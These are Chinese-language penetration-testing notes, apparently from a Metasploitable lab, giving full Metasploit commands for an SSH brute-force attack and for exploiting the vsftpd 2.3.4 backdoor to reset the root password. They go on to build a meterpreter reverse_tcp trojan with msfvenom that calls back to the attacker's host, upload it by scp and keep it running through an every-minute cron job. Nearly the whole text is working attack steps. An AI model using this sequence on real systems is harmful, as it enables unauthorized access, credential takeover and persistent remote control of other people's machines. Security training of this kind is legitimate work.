==禁止非法操作,仅限参考=
暴力破解
- 编辑密码本(vim password.txt)
- 无声进入msf(msfconsole -q)
- 搜索ssh_login相关程序(search ssh_login)
- 设置攻击参数(use 0)
设置用户名(set username msfadmin)
设置密码本(set pass_file /root/password.txt)
设置攻击目标(set rhosts 192.168.10.143) - 发起攻击(运行run)
- 查看攻击会话(sessions)
- 进入某个会话(sessions ID)
- 退出(exit)
- show options://显示程序运行时所需要的参数
漏洞利用
- 扫描目标是否存在"笑脸漏洞(vsftpd2.3.4)"(nmap -sV ip)
- 发起漏洞利用
进入msf(msfconsole)
搜索vsftpd(search vsftpd)
使用程序(use 0)
设置攻击目标(set rhosts ip) - 发起攻击(run)
- whoami://查看是哪个用户
- passwd root:// 设置密码
植入木马,达到长期控制的目的
- msfvenom:攻击载荷生成器
-p://选择一个载荷
-f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
lhost://监听地址(攻击机kali的地址)
lport://监听端口(攻击机kali的端口)
-o:指定输出的文件名
-h:查看帮助 - msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序
为了防止上传报错,需要修改kali的ssh配置
- 创建.ssh目录
mkdir .ssh - 配置config
vim .ssh/config - 添加三行配置
- Host
- HostkeyAlgorithms +ssh-rsa
- PubkeyAcceptedKeyTypes +ssh-rsa
- 以root身份上传shell后门到192.168.10.143的/mnt
scp shell root@192.168.10.143:/mnt
运行shell
- 手动运行shell后门程序
/mnt/shell & (&后台运行) - 在kali中侦听木马程序
- 进入msf
msfconsole - 使用侦听程序
use exploit/multi/handler - 设置监听地址
set lhost 192.168.10.224 - 设置监听端口
set lport 4444 - 设置载荷
set payload linux/x86/meterpreter/reverse_tcp - 运行
run
ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致
如果想要让木马长期运行不被kill,需要做计划任务,定期运行
- 编辑计划任务:
- EDITOR:编辑器
EDITOR=vim crontab -e
*
*
*
*
* /mnt/shell&(每分钟运行一次) - 再次进入msf
- 使用侦听程序
use exploit/multi/handler - 设置监听地址
set lhost 192.168.10.224 - 设置监听端口
set lport 4444 - 设置载荷
set payload linux/x86/meterpreter/reverse_tcp - 运行
run - 查看计划任务
crontab -l - meterpreter>下将会话放到后台
background